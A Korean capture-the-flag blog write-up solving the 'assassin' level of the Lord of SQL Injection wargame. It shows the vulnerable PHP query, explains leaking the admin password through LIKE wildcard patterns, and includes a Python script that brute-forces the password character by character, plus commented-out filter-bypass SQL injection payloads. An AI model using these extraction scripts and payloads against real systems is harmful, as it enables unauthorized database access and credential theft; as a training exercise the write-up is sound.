반응형
문제 소스:
|
1
2
3
4
5
6
7
8
9
10
11
12
|
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_assassin where pw like '{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("assassin");
highlight_file(__FILE__);
?>
|
cs |
이때까지 sql에서 like을 =을 우회하는 용도로만 사용했지만 사실 다른 기능도 있다. (당연히..)
바로 패턴 검색이다.
https://makand.tistory.com/entry/SQL-LIKE-%EA%B5%AC%EB%AC%B8
SQL LIKE 구문
이번에 포스팅할 내용은 SQL 구문중 LIKE 입니다. LIKE 연산자는 지정된 패턴을 검색하는데 사용합니다. 예를들어 "나는 지금 블로그에 글을 쓰고 있습니다." 라는 제목으로 글을 저장하고 그 글을 검색할 경우..
makand.tistory.com
패턴 검색을 이용해서 %0%을 넣으면 0이 가운데 들어가 있는 모든 값을 불러오게 되는데,
그 결과 hello guest가 출력되었다.
첫문자% 을 이용해서 pw을 알아내면 된다.
코드 짜서 돌리면 된다.
근데 guest만 나오게 되는데, 이를 봐선 guest의 pw와 admin의 pw의 앞부분이 어느정도 일치하는 걸로 예상할 수 있다.
그래서 이어서 다음 자리까지 찾아나가야 한다.
ex.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
import urllib
import urllib2
import sys
import time
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
for i in range(8):
for j in range(len(string)):
#payload = "1' || '1'='1' &&(substring(pw,"+str(i+1)+",1)='"+string[j]+"')#"
#payload = "1' || '1'like'1' &&(mid(pw,"+str(i+1)+",1) like '"+string[j]+"')#"
#payload = "1 or id like 0x61646d696e and ord(mid(pw,"+str(i+1)+",1)) like "+str(ord(string[j]))+"#"
#payload = "1 || id in (\"admin\") && hex(mid(pw,"+str(i+1)+",1)) > hex("+str(ord(string[j])-1)+") && hex(mid(pw,"+str(i+1)+",1)) < hex("+str(ord(string[j])+1)+")#"
payload = "여기에 나온 값들을 붙여주면 된다."+string[j]+"%"
#payload = urllib.quote(payload)
#payload = payload.replace("%20","%0a")
url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw="+payload
print url
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie', 'PHPSESSID=your_cookie_value_here')
request.get_method = lambda:'GET'
data = opener.open(request)
data = data.read()
if "Hello admin" in data:
key += string[j]
print "[*] Find Password!! Password is ["+key+"] admin"
break
elif "Hello guest" in data:
key += string[j]
print "[*] Find Password!! Password is ["+key+"] guest"
break
else:
print "[-] Fail!"
time.sleep(0.1)
|
cs |
반응형
'WAR GAME > Lord of SQLi' 카테고리의 다른 글
| LORD OF SQL INJECTION [ZOMBIE_ASSASSIN] 풀이 (1) | 2019.11.08 |
|---|---|
| LORD OF SQL INJECTION [SUCCUBUS] 풀이 (0) | 2019.11.07 |
| LORD OF SQL INJECTION [GIANT] 풀이 (0) | 2019.11.05 |
| LORD OF SQL INJECTION [bugbear] 풀이 (0) | 2019.11.04 |
| LORD OF SQL INJECTION [darkknight] 풀이 (0) | 2019.11.02 |